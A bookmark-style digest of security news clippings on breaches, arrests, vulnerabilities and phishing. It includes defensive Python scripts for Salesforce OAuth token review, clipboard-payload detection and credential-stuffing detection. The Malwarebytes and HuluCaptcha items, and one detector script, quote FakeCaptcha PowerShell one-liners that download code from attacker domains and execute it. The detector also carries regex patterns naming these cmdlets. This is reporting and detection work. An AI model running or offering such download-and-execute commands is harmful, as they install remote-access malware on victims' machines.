EU launches EU-based, privacy-focused DNS resolution service
DNS4EU, an EU-based DNS resolution service created to strengthen the European Union's digital sovereignty, has become reality. What is DNS? The Domain Name System (DNS) "translates" human-readable domain names into IP addresses and back, and is essential for accessing websites. Most users rely on the DNS resolver provided by their internet service provider (because it is configured automatically) or on a public DNS provider such as Google or Cloudflare. DNS4EU is meant to be a resilient, fast, reliable, secure, privacy-friendly and EU-based alternative to those. The goal of DNS4EU: DNS4EU is an initiative co-funded by the European Union and supported by the European Union Agency for Cybersecurity (ENISA), though the service is expected to be commercialised, "since it has to be sustainable without operational costs from the EU after 2025." It is developed and managed by a consortium of private cybersecurity companies, CERTs, and academic institutions from 10 European Union countries, with Czech cybersecurity company Whalebone as its leader. "The DNS4EU initiative aligns with the EU's strategic goal of enhancing its digital autonomy by providing an alternative to the existing public DNS services provided by non-european entities," says the group.
·helpnetsecurity.com·
Major food wholesaler says cyberattack impacting distribution systems
One of the largest food distributors in the U.S. reported a cyberattack to regulators on Monday, explaining that the incident has disrupted its operations and ability to fulfil customer orders. United Natural Foods released a public statement and filed documents with the U.S. Securities and Exchange Commission (SEC) saying the cyberattack began on June 5. The statement said the Rhode Island-based company identified unauthorized activity on its systems on Thursday, prompting officials to take systems offline. The action “has temporarily impacted the Company’s ability to fulfill and distribute customer orders.” “The incident has caused, and is expected to continue to cause, temporary disruptions to the Company’s business operations,” United Natural Foods said. “The Company has implemented workarounds for certain operations in order to continue servicing its customers where possible. The Company is continuing to work to restore its systems to safely bring them back online.” Law enforcement has been notified and the company said it has hired a cybersecurity firm to remediate the incident. The investigation into the attack “remains ongoing and is in its early stages.” The press statement published on Monday said the company is working closely with “customers, suppliers, and associates” to minimize the disruption. The company did not respond to requests for comment. United Natural Foods is the main supplier for Whole Foods and is considered the largest health and specialty food distributor in the United States and Canada. The company reported $8.2 billion in net sales last quarter.
·therecord.media·
Cybercriminals Are Hiding Malicious Web Traffic in Plain Sight
In an effort to evade detection, cybercriminals are increasingly turning to "residential proxy" services that cover their tracks by making their traffic look like everyday online activity. For years, gray-market services known as "bulletproof" hosts have been a key tool for cybercriminals looking to anonymously maintain web infrastructure with no questions asked. But as global law enforcement scrambles to crack down on digital threats, investigators have developed strategies for getting customer information from these hosts and have increasingly targeted the people behind the services with indictments. At the cybercrime-focused conference Sleuthcon in Arlington, Virginia, today, researcher Thibault Seret outlined how this shift has pushed both bulletproof hosting companies and their criminal customers toward an alternative approach. Rather than relying on web hosts to find ways of operating outside law enforcement's reach, some service providers have turned to offering purpose-built VPNs and other proxy services as a way of rotating and masking customer IP addresses, and offering infrastructure that either intentionally doesn't log traffic or mixes traffic from many sources together. And while the technology isn't new, Seret and other researchers emphasized to WIRED that the transition to proxies among cybercriminals over the last couple of years is significant.
·wired.com·
Microsoft launches new European Security Program
As AI and digital technologies advance, the European cyber threat landscape continues to evolve, presenting new challenges that require stronger partnerships and enhanced solutions. Ransomware groups and state-sponsored actors from Russia, China, Iran, and North Korea continue to grow in scope and sophistication, and European cyber protection cannot afford to stand still. That is why, today, in Berlin, we are announcing a new Microsoft initiative to expand our longstanding work to help defend Europe's cybersecurity. Implementing one of the five European Digital Commitments I shared in Brussels five weeks ago, we are launching a new European Security Program that adds to the company's longstanding global Government Security Program. This new program expands the geographic reach of our existing work and adds new elements that will become critical to Europe's protection. It puts AI at the center of our work as a tool to protect traditional cybersecurity needs and strengthens our protection of digital and AI infrastructure. We are launching the European Security Program with three new elements:
- Increasing AI-based threat intelligence sharing with European governments;
- Making additional investments to strengthen cybersecurity capacity and resilience; and
- Expanding our partnerships to disrupt cyberattacks and dismantle the networks cybercriminals us
·blogs.microsoft.com·
The Cost of a Call: From Voice Phishing to Data Extortion
UNC6040 uses vishing to impersonate IT support, deceiving victims into granting access to their Salesforce instances. Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing) campaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion. Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements. This approach has proven particularly effective in tricking employees, often within English-speaking branches of multinational corporations, into actions that grant the attackers access or lead to the sharing of sensitive credentials, ultimately facilitating the theft of organizations' Salesforce data. In all observed cases, attackers relied on manipulating end users, not on exploiting any vulnerability inherent to Salesforce. A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal. This application is often a modified version of Salesforce's Data Loader, not authorized by Salesforce. During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version. This step inadvertently grants UNC6040 significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments. This methodology of abusing Data Loader functionality via malicious connected apps is consistent with recent observations detailed by Salesforce in its guidance on protecting Salesforce environments from such threats.
In some instances, extortion activities haven't been observed until several months after the initial UNC6040 intrusion activity, which could suggest that UNC6040 has partnered with a second threat actor that monetizes access to the stolen data. During these extortion attempts, the actor has claimed affiliation with the well-known hacking group ShinyHunters, likely as a method to increase pressure on their victims.
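The practical defender's follow-up to the above is to review which connected apps users have actually authorized. The script below is an added example for this bookmark, not code from GTIG's report or from Salesforce's guidance: it takes OAuth token rows of the kind a SOQL query against OauthToken returns and flags apps that are not on an allowlist, that mimic the Data Loader branding, or that were authorized within a recent window. The token rows and the review timestamp are constructed; the allowlist names ("Dataloader Bulk", "Dataloader Partner") and the OauthToken field names are assumptions to verify against your own org before relying on them.

```python
import difflib
import re
from datetime import datetime, timedelta, timezone

# SOQL that pulls the same columns from a live org. Field names are as I
# remember them for the OauthToken object; check them against your API version.
#   SELECT AppName, User.Username, CreatedDate, UseCount FROM OauthToken
# The rows below are constructed for this example, not exported from any org.
TOKENS = [
    {"AppName": "Dataloader Bulk", "Username": "ops.admin@example.invalid",
     "CreatedDate": "2025-01-10T09:00:00Z", "UseCount": 212},
    {"AppName": "Dataloader Partner", "Username": "ops.admin@example.invalid",
     "CreatedDate": "2024-11-20T08:00:00Z", "UseCount": 40},
    {"AppName": "Data Loader", "Username": "jane.doe@example.invalid",
     "CreatedDate": "2025-06-02T14:32:00Z", "UseCount": 3},
    {"AppName": "Support Tools", "Username": "john.roe@example.invalid",
     "CreatedDate": "2025-06-03T11:05:00Z", "UseCount": 1},
]

# Assumption: these are the connected-app names the genuine Salesforce Data
# Loader registers. Replace with the allowlist from your own OAuth usage review.
ALLOWLIST = {"Dataloader Bulk", "Dataloader Partner"}
LOADER_REFERENCE = "dataloader"

# Constructed "now" so the example is deterministic.
REVIEW_TIME = datetime(2025, 6, 9, tzinfo=timezone.utc)


def canon(name: str) -> str:
    """Lowercase and drop everything but letters and digits, so 'Data Loader',
    'data-loader' and 'DataLoader' compare equal."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def mimics_data_loader(name: str, threshold: float = 0.8) -> bool:
    """True if the app name is a lookalike of the Data Loader branding: either it
    contains 'loader' outright or it is within edit-similarity of the reference
    (catches homoglyph-style variants such as a zero for the letter o)."""
    c = canon(name)
    if "loader" in c:
        return True
    return difflib.SequenceMatcher(None, c, LOADER_REFERENCE).ratio() >= threshold


def review_tokens(tokens, now: datetime, window_days: int = 30):
    """Return one finding per token whose app is not allowlisted, with reasons."""
    allow = {canon(a) for a in ALLOWLIST}
    cutoff = now - timedelta(days=window_days)
    findings = []
    for t in tokens:
        if canon(t["AppName"]) in allow:
            continue  # known-good app; nothing to flag
        reasons = ["not_allowlisted"]
        if mimics_data_loader(t["AppName"]):
            reasons.append("mimics_data_loader")
        created = datetime.fromisoformat(t["CreatedDate"].replace("Z", "+00:00"))
        if created >= cutoff:
            reasons.append("recently_authorized")
        findings.append({"user": t["Username"], "app": t["AppName"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in review_tokens(TOKENS, now=REVIEW_TIME):
        print(f"{f['user']:28s} {f['app']:20s} {', '.join(f['reasons'])}")
```

Anything flagged with both "mimics_data_loader" and "recently_authorized" is the pattern the report describes and is worth a call to the user before the token is revoked; a name that merely isn't allowlisted may just be an app nobody inventoried.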
·cloud.google.com·
Hackers Leak 86 Million AT&T Records with Decrypted SSNs
Hackers leak data of 88 million AT&T customers with decrypted SSNs; latest breach raises questions about links to earlier Snowflake-related attack. Hackers have leaked what they claim is AT&T's database, which was reportedly stolen by the ShinyHunters group in April 2024 after they exploited major security flaws in the Snowflake cloud data platform. But is this really the Snowflake-linked data? We took a closer look. As seen by the Hackread.com research team, the data was first posted on a well-known Russian cybercrime forum on May 15, 2025. It was re-uploaded on the same forum on June 3, 2025, after which it began circulating among other hackers and forums. After analyzing the leaked data, we found it contains a detailed set of personal information. Each of these data points poses a serious privacy risk on its own, but together they create full identity profiles that could be exploited for fraud or identity theft. The data includes:
- Full names
- Date of birth
- Phone numbers
- Email addresses
- Physical addresses
- 44 million Social Security Numbers (SSN) (43,989,219 in total)
·hackread.com·
Hacker selling critical Roundcube webmail exploit as tech info disclosed
Hackers are actively exploiting CVE-2025-49113, a critical vulnerability in the widely used Roundcube open-source webmail application that allows remote code execution. The security issue has been present in Roundcube for over a decade and impacts Roundcube webmail versions 1.1.0 through 1.6.10. It received a patch on June 1st. It took attackers just a couple of days to reverse engineer the fix, weaponize the vulnerability, and start selling a working exploit on at least one hacker forum. Roundcube is one of the most popular webmail solutions, as the product is included in offers from well-known hosting providers such as GoDaddy, Hostinger, Dreamhost, and OVH. "Email armageddon": CVE-2025-49113 is a post-authentication remote code execution (RCE) vulnerability that received a critical severity score of 9.9 out of 10 and is described as "email armageddon." It was discovered and reported by Kirill Firsov, the CEO of the cybersecurity company FearsOff, who decided to publish the technical details before the end of the responsible disclosure period because an exploit had become available.
·bleepingcomputer.com·
U.S. Government seizes approximately 145 criminal marketplace domains
The U.S. Attorney's Office for the Eastern District of Virginia announced today the seizure of approximately 145 darknet and traditional internet domains, and cryptocurrency funds associated with the BidenCash marketplace. The operators of the BidenCash marketplace use the platform to simplify the process of buying and selling stolen credit cards and associated personal information. BidenCash commenced operations in March 2022. BidenCash administrators charged a fee for every transaction conducted on the website. The BidenCash marketplace had grown to support over 117,000 customers, facilitated the trafficking of over 15 million payment card numbers and personally identifiable information, and generated over $17 million in revenue during its operations. The BidenCash marketplace domains will no longer be operational and will be redirected to a U.S. law enforcement-controlled server, preventing future criminal activity on these sites. The marketplace also sold compromised credentials that could be used to access computers without proper authorization. Between October 2022 and February 2023, the BidenCash marketplace published 3.3 million individual stolen credit cards for free to promote the use of their services. The stolen data included credit card numbers, expiration dates, Card Verification Value (CVV) numbers, account holder names, addresses, email addresses, and phone numbers. According to court records, the United States obtained court authorization to seize cryptocurrency funds that BidenCash marketplace used to receive illicit proceeds from its illegal sales. Erik S. Siebert, U.S. Attorney for the Eastern District of Virginia; John Szydlik, Resident Agent in Charge of the U.S. Secret Service's Frankfurt Resident Office; and Philip Russell, Acting Special Agent in Charge of the FBI Albuquerque Field Office, made the announcement. This case was investigated by the U.S. Secret Service's Frankfurt Resident Office, the U.S. Secret Service's Cyber Investigative Section, and the FBI Albuquerque Field Office. The Department of Justice thanks the Dutch National High Tech Crime Unit, The Shadowserver Foundation and Searchlight Cyber for their assistance with the investigation. The government is represented by Assistant U.S. Attorney Zoe Bedell in these matters.
·justice.gov·
Cisco warns of ISE and CCP flaws with public exploit code
Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions. The most severe of the three is a critical static credential vulnerability tracked as CVE-2025-20286, found by GMO Cybersecurity's Kentaro Kawane in Cisco ISE. This identity-based policy enforcement software provides endpoint access control and network device administration in enterprise environments. The vulnerability is due to improperly generated credentials when deploying Cisco ISE on cloud platforms, resulting in shared credentials across different deployments. Unauthenticated attackers can exploit it by extracting user credentials from Cisco ISE cloud deployments and using them to access installations in other cloud environments. However, as Cisco explained, threat actors can exploit this flaw successfully only if the Primary Administration node is deployed in the cloud. "A vulnerability in Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems," the company explained.
·bleepingcomputer.com·
HuluCaptcha — An example of a FakeCaptcha framework
Hello and welcome back to another blog post. After some time of absence due to a lot of changes in my personal life (finished university, started a new job, etc.), I am happy to finally be able to present something new. Chapter 1: Captcha-verified Victim. This story starts with a message by one of my long-time internet contacts: (Figure 1: Shit hit the Fan) I assume some of you can already tell from this message alone that something terrible had just happened to him. The legitimate website of the German Association for International Law had redirected him to an apparent Cloudflare Captcha site asking him to execute a PowerShell command on his device that does a web request (iwr = Invoke-WebRequest) to a remote website (amoliera[.]com) and then pipes the response into "iex", which stands for Invoke-Expression. That's a textbook example of a so-called FakeCaptcha attack. For those of you that do not know what the FakeCaptcha attack technique is, let me give you a short primer: A Captcha in itself is a legitimate method website owners use to differentiate between bots (automated traffic) and real human users. It often involves at least clicking a button, but can additionally require the website visitor to solve different kinds of small tasks, like clicking certain images out of a collection of random images or identifying a bunch of obscurely written letters. The goal is to only let users visit the website that are able to solve these tasks, which are often designed to be hard for computers but easy for human beings. Well, most of the time.
·gi7w0rm.medium.com·
Akira doesn’t keep its promises to victims — SuspectFile
Over on SuspectFile, @amvinfe has been busy exposing Akira's false promises to its victims. In two posts this week, he reports on what happened with one business in New Jersey and one in Germany that decided to pay Akira's ransom demands. He was able to report on it all because Akira failed to secure its negotiations chat server. Anyone who knows where to look can follow along if a victim contacts Akira to try to negotiate any payment for a decryptor or data deletion. In one case, the victim paid Akira $200k after repeatedly asking for, and getting, assurances that this would all be kept confidential. In the second case, Akira demanded $6.9 million but eventually accepted that victim's offer of $800k. The negotiations made clear that Akira had read the terms of the victim's cyberinsurance policy and used that to calculate their demands. If the two victims hoped to keep their names or their breaches out of the news, they may have failed. Although SuspectFile did not name them, others with access to the chats might report on the incidents. Anyone who read the chats would possess the file lists of everything Akira claimed to have exfiltrated from each victim. Depending on their file-naming conventions, filenames may reveal proprietary or sensitive information and often reveal the name of the victim. So the take-home messages for current victims of Akira:
- Akira has not been keeping its negotiations with you secure and confidential.
- Paying Akira's ransom demands is no guarantee that others will not obtain your data or find out about your breach.
- Even just negotiating with Akira may be sufficient to provide researchers and journalists with data you do not want shared.
- If you pay Akira and they actually give you accurate information about how they gained access and elevated privileges, you are now more at risk from other attackers while you figure out how to secure your network.
·databreaches.net·
Victims risk AsyncRAT infection after being redirected to fake Booking.com sites
We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT. Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media, and as sponsored ads, that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers. The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days. Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device. (Image: fake Captcha prompt) As usual on these websites, by putting a checkmark in the fake Captcha prompt you're giving the website permission to copy something to your clipboard. Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals. (Image: instructions to infect your own device) If you're using Chrome, you may see this warning: (Image: Chrome issues a warning, but what the warning is for may be unclear to users) The warning is nice, but it's not very clear what this warning is for, in my opinion. Users of Malwarebytes' Browser Guard will see this warning: (Image: Malwarebytes Browser Guard's clipboard warning) "Hey, did you just copy something? Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don't want it. Like a terminal or an email to your boss." Well, either way, don't just discard these warnings. Even if you think you're looking at an actual booking website, this is not the kind of instructions you're expected to follow.
What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger:
pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:
powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
The malicious Captcha form tells the user to paste the content of the clipboard into the Windows Run dialog box and execute the instructions in the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it adds the phrase "Suspicious Content" at the front of the copied content, which makes it an invalid command, and the user sees a warning instead of having infected themselves. Should a user fall for this without any protections enabled, the command opens a hidden PowerShell window to download and execute a file called ckjg.exe, which in turn downloads and executes a file called Stub.exe, detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT. Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT. The criminals can gather sensitive and financial information from infected devices, which can lead to financial damages and even identity theft. IOCs: The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.
(booking.)chargesguestescenter[.]com
(booking.)badgustrewivers.com[.]com
(booking.)property-paids[.]com
(booking.)rewiewqproperty[.]com
(booking.)extranet-listing[.]com
(booking.)guestsalerts[.]com
(booking.)gustescharge[.]com
kvhandelregis[.]com
patheer-moreinfo[.]com
guestalerthelp[.]com
rewiewwselect[.]com
hekpaharma[.]com
bkngnet[.]com
partnervrft[.]com
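The clipboard payload in this write-up and the `iwr ... | iex` one-liner in the HuluCaptcha post above are the same technique with different cosmetics, so one normaliser serves both. The script below is an added example for these two bookmarks, not code from either post and not Browser Guard's logic: it strips the quote interruption and case games, then scores the recovered command on download-and-execute indicators and pulls out the host it would contact. It is run over the obfuscated string quoted above (copied from the post, including the dash as rendered there) plus two constructed samples; the `example.invalid` hosts are placeholders, not observed infrastructure.

```python
import re

# Clipboard payloads to analyse. BOOKING_SAMPLE is the obfuscated command quoted
# in the Malwarebytes post; the other two are constructed for this example and
# use the reserved example.invalid domain rather than any real infrastructure.
BOOKING_SAMPLE = (
    'pOwERsheLl \u2013N"O"p"rO" /w h -C"Om"ManD "$b"a"np = \'b"kn"g"n"et.com\';'
    '$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"'
)
CAPTCHA_SAMPLE = 'powershell -w h "iwr example.invalid/x | iex"'  # constructed iwr|iex lure
BENIGN_SAMPLE = "powershell -NoProfile -Command Get-Process"      # constructed, harmless

INDICATORS = {
    # Launches a PowerShell host (what the Run dialog will actually start).
    "powershell_host": r"\b(?:powershell(?:\.exe)?|pwsh)\b",
    # Fetches remote content: iwr/irm cmdlets, .NET WebClient methods, BITS.
    "remote_fetch": r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                    r"downloadstring|downloadfile|start-bitstransfer)\b",
    # Executes a string as code.
    "string_exec": r"\b(?:iex|invoke-expression)\b",
    # Hides the console window so the victim sees nothing happen.
    "hidden_window": r"(?:^|\s)(?:-w(?:indowstyle)?|/w)\s+h(?:idden)?\b",
    # Skips profile scripts (faster start, fewer defender hooks).
    "no_profile": r"(?:^|\s)-nop\w*",
}
HOST_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b")


def normalize(cmd: str) -> str:
    """Undo the cheap obfuscation seen in these lures.

    PowerShell's command-line parser concatenates adjacent quoted and unquoted
    fragments, so I"n"v"oke is the same token as Invoke; stripping double quotes
    recovers what the shell will see. Case is folded because cmdlet and parameter
    names are case-insensitive, and the Unicode dashes that copy/paste or page
    rendering introduce are mapped back to a plain hyphen.
    """
    s = cmd.replace('"', "")
    s = s.replace("\u2013", "-").replace("\u2014", "-")
    return re.sub(r"\s+", " ", s).strip().lower()


def analyze(cmd: str) -> dict:
    """Score a clipboard payload and extract the host it would reach out to."""
    norm = normalize(cmd)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, norm)]
    hosts = HOST_RE.findall(norm)
    if "remote_fetch" in hits and "string_exec" in hits:
        verdict = "malicious"   # download-and-execute is the FakeCaptcha signature
    elif "string_exec" in hits or "hidden_window" in hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits, "hosts": hosts, "normalized": norm}


if __name__ == "__main__":
    for label, sample in (("booking", BOOKING_SAMPLE),
                          ("captcha", CAPTCHA_SAMPLE),
                          ("benign", BENIGN_SAMPLE)):
        r = analyze(sample)
        print(f"{label:8s} {r['verdict']:10s} hosts={r['hosts']} indicators={r['indicators']}")
```

The same normalise-then-match step is what makes a clipboard or Run-dialog hook useful: matching the raw text against "Invoke-Expression" misses every variant on this page, while matching the normalised text catches them with one rule.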
·malwarebytes.com·
International operation results in arrest of 22 men in Nigeria for sextortion | Australian Federal Police
The AFP has played a key role in a landmark international operation targeting perpetrators of online sextortion, which resulted in the arrest of 22 suspects in Nigeria. CORRECTION: The arrest of two Nigerian-based offenders linked to the suicide of a 16-year-old child in New South Wales in 2023 was NOT part of Operation Artemis. Those arrests occurred after Operation Artemis, when they were conducted by Nigeria's Economic and Financial Crimes Commission to assist a NSW Police Force investigation. Operation Artemis was a joint operation led by the US Federal Bureau of Investigation in partnership with the AFP, Royal Canadian Mounted Police, and Nigeria's Economic and Financial Crimes Commission (EFCC). It focused on dismantling an organised criminal network allegedly responsible for a wave of online sextortion crimes which targeted thousands of teenagers globally. The network's scheme, which coerced victims into sharing sexually explicit images before threatening to distribute those images unless payment was made, had devastating consequences. In the United States alone, more than 20 teenage suicides have been linked to sextortion-related cases since 2021. While many victims were based in North America, the ripple effects of the offending extended to Australia and other nations.
·afp.gov.au·
Malaysian home minister’s WhatsApp hacked, used to scam contacts
The hack into the account of the country’s top security official has drawn criticism online. Malaysia’s home minister had his WhatsApp account hacked and then abused to send malicious links to his contacts, according to police. The attacker reportedly used a virtual private network (VPN) to compromise the account of Datuk Seri Saifuddin Nasution Ismail, authorities said at a press conference on Friday, adding that no victims have reported financial losses so far. They did not elaborate on how the hack was carried out. The Ministry of Home Affairs, which oversees law enforcement, immigration and censorship, confirmed the incident and urged the public not to respond to any messages or calls claiming to be from the minister, especially those involving financial or personal requests. The breach is under investigation and law enforcement is working to determine the hacker’s location. Mobile phishing scams have become increasingly common in Malaysia. Local media have reported that citizens are frequently targeted by fraudsters posing as police, bank officials or court representatives. The recent WhatsApp incident follows similar attacks on other high-ranking officials. In March, scammers hijacked the WhatsApp account of parliamentary speaker Johari Abdul and tricked some of his contacts into sending money. In 2022, threat actors accessed Telegram and Signal accounts belonging to former Prime Minister Ismail Sabri. And in 2015, hackers took over the Royal Malaysia Police’s Twitter and Facebook accounts, posting pro-Islamic State group messages. Nasution Ismail faced online criticism and ridicule following the WhatsApp hack, with local media reporting that citizens questioned the strength of Malaysia’s cybersecurity measures, given that the country’s top security official had been successfully targeted by hackers.
·therecord.media·
Vanta bug exposed customers' data to other customers | TechCrunch
The compliance company said the customer data exposure was caused by a product change. Compliance company Vanta has confirmed that a bug exposed the private data of some of its customers to other Vanta customers. The company told TechCrunch that the data exposure was the result of a product code change and not caused by an intrusion. Vanta, which helps corporate customers automate their security and compliance processes, said it identified the issue on May 26 and that remediation will complete June 4. The incident resulted in "a subset of data from fewer than 20% of our third-party integrations being exposed to other Vanta customers," according to the statement attributed to Vanta's chief product officer Jeremy Epling. Epling said fewer than 4% of Vanta customers were affected, and that all have been notified. Vanta has more than 10,000 customers, according to its website, suggesting the data exposure likely affects hundreds of Vanta customers. One customer affected by the incident told TechCrunch that Vanta had notified them of the data exposure. The customer said Vanta told them that "employee account data was erroneously pulled into your Vanta instance, as well as out of your Vanta instance into other customers' instances."
·techcrunch.com·
Algerian ‘Jabaroot’ Group Behind CNSS Breach Attacks Moroccan Property Registry
The Moroccan National Agency for Land Conservation, Cadastre and Cartography (ANCFCC) has become the latest victim of a major cyberattack claimed by “Jabaroot,” the same hacker group behind April’s CNSS breach. The group, which identifies itself as Algerian, announced the attack on Monday, allegedly resulting in the theft and subsequent leak of thousands of sensitive property documents. According to claims the group made on their Telegram channel, the hackers have exfiltrated and released what they describe as “a massive amount of sensitive data” from ANCFCC’s databases. The leaked information reportedly includes 10,000 property ownership certificates out of a total database of more than 10 million land titles. The compromised data allegedly contains cadastral information, property owner identities, real estate references, and various personal and administrative documents.
·moroccoworldnews.com·
Thousands Hit by The North Face Credential Stuffing Attack
Sports apparel and footwear giant VF Corporation is notifying over 2,800 individuals that their personal information was compromised in a recent credential stuffing attack aimed at The North Face website. Credential stuffing occurs when threat actors leverage email addresses, usernames, and passwords compromised in a previous data breach to access accounts on a different online service where the same credentials have been used. According to notification letters VF Corporation sent this week to the impacted individuals, copies of which were submitted to multiple regulators, a threat actor employed this technique on April 23 against a small set of user accounts on thenorthface.com website. “Based on our investigation, we believe that the attacker previously gained access to your email address and password from another source (not from us) and then used those same credentials to access your account on our website,” the company’s notification letter reads. VF Corporation says it discovered the suspicious activity on the same day, and informed the Maine Attorney General’s Office that a total of 2,861 user accounts were compromised. The campaign resulted in the attackers gaining access to the information stored in the compromised accounts, such as names, addresses, email addresses, dates of birth, phone numbers, user preferences, and details on the items purchased on the website. The company underlines that payment card information was not compromised because it does not store such data on its website. “We only retain a ‘token’ linked to your payment card, and only our third-party payment card processor keeps payment card details. The token cannot be used to initiate a purchase anywhere other than on our website. Accordingly, your credit card information is not at risk as a result of this incident,” it says.
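What the technique described above looks like from the defender's side is a burst of logins from one source that tries many different usernames once or twice each, with mostly failures and a few successes. The detector below is an added example for this bookmark, not VF Corporation's or SecurityWeek's code, and runs over a constructed authentication log in the form "timestamp source-IP username success|fail". It separates credential stuffing (many accounts, few tries each) from password brute force (one account, many tries) and from a user who simply mistyped a password, and returns the accounts that were actually taken over so they can be reset.

```python
from collections import defaultdict
from datetime import datetime

# Constructed authentication log, one attempt per line. Not real data from any site.
SAMPLE_LOG = """\
2025-04-23T02:00:01Z 198.51.100.7 alice@example.invalid fail
2025-04-23T02:00:02Z 198.51.100.7 bob@example.invalid fail
2025-04-23T02:00:02Z 198.51.100.7 carol@example.invalid success
2025-04-23T02:00:03Z 198.51.100.7 dave@example.invalid fail
2025-04-23T02:00:03Z 198.51.100.7 erin@example.invalid fail
2025-04-23T02:00:04Z 198.51.100.7 frank@example.invalid success
2025-04-23T02:00:05Z 198.51.100.7 grace@example.invalid fail
2025-04-23T02:00:05Z 198.51.100.7 heidi@example.invalid fail
2025-04-23T02:00:06Z 198.51.100.7 ivan@example.invalid fail
2025-04-23T02:00:06Z 198.51.100.7 judy@example.invalid fail
2025-04-23T09:15:00Z 203.0.113.5 alice@example.invalid fail
2025-04-23T09:15:20Z 203.0.113.5 alice@example.invalid success
2025-04-23T10:00:00Z 192.0.2.44 mallory@example.invalid success
"""


def parse(log_text: str):
    """Parse the log into (timestamp, ip, user, outcome) tuples, oldest first."""
    rows = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, outcome = line.split()
        rows.append((datetime.fromisoformat(ts.replace("Z", "+00:00")), ip, user, outcome))
    rows.sort(key=lambda r: r[0])
    return rows


def find_stuffing(rows, min_users=5, max_attempts_per_user=2.0, min_fail_rate=0.5):
    """Flag source IPs whose attempts spread across many accounts with few tries each.

    Returns {ip: {"distinct_users", "attempts", "failures", "compromised"}} where
    "compromised" lists the accounts that succeeded from that source: those are
    the reused-password victims who need a forced reset.
    """
    per_ip = defaultdict(lambda: {"attempts": 0, "users": set(), "fails": 0, "hits": []})
    for _ts, ip, user, outcome in rows:
        s = per_ip[ip]
        s["attempts"] += 1
        s["users"].add(user)
        if outcome == "fail":
            s["fails"] += 1
        else:
            s["hits"].append(user)

    findings = {}
    for ip, s in per_ip.items():
        n_users = len(s["users"])
        if n_users < min_users:
            continue  # too few accounts to be a list replay
        if s["attempts"] / n_users > max_attempts_per_user:
            continue  # many tries per account is brute force, a different playbook
        if s["fails"] / s["attempts"] < min_fail_rate:
            continue  # stuffed lists mostly miss; a high hit rate is something else
        findings[ip] = {
            "distinct_users": n_users,
            "attempts": s["attempts"],
            "failures": s["fails"],
            "compromised": sorted(s["hits"]),
        }
    return findings


if __name__ == "__main__":
    for ip, f in find_stuffing(parse(SAMPLE_LOG)).items():
        print(f"{ip}: {f['distinct_users']} accounts, {f['failures']}/{f['attempts']} failed, "
              f"compromised={f['compromised']}")
```

Grouping by source IP is the simplest cut and is enough for the sample; against an attacker rotating through residential proxies (see the WIRED item above) the per-IP counts flatten out, and the same logic has to be keyed on something the proxy does not change, such as a TLS or browser fingerprint, or run on the site-wide ratio of distinct usernames to attempts over a short window.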
·securityweek.com·
Fraudulent emails in circulation
Emails with a forged sender named «Kanton Schaffhausen» are currently in circulation. The email promises a refund. The link it contains leads to the download of software that enables remote control of your computer. These emails are fake and do not originate from the Canton of Schaffhausen.
What you should do:
Under no circumstances follow the instructions they contain.
Delete the email and mark it as spam.
If you have already clicked the link and the remote-control software was installed on your computer:
1. Remove the installed software and reinstall the computer from scratch.
2. Change your passwords immediately. Check whether your email address and passwords have already fallen into the wrong hands or been misused on the internet: https://www.ibarry.ch/de/sicherheits-checks
3. Monitor your bank account and contact your bank if you suspect anything, especially if you have accessed your bank account from this computer in the meantime.
4. Report the incident (voluntarily) to the Federal Office for Cybersecurity (BACS): https://www.report.ncsc.admin.ch/
5. File a criminal complaint with the police online at https://www.suisse-epolice.ch if you have suffered a loss.
6. See the tips and information on phishing and cybersecurity at https://www.s-u-p-e-r.ch
·sh.ch·
Google Researchers Find New Chrome Zero-Day
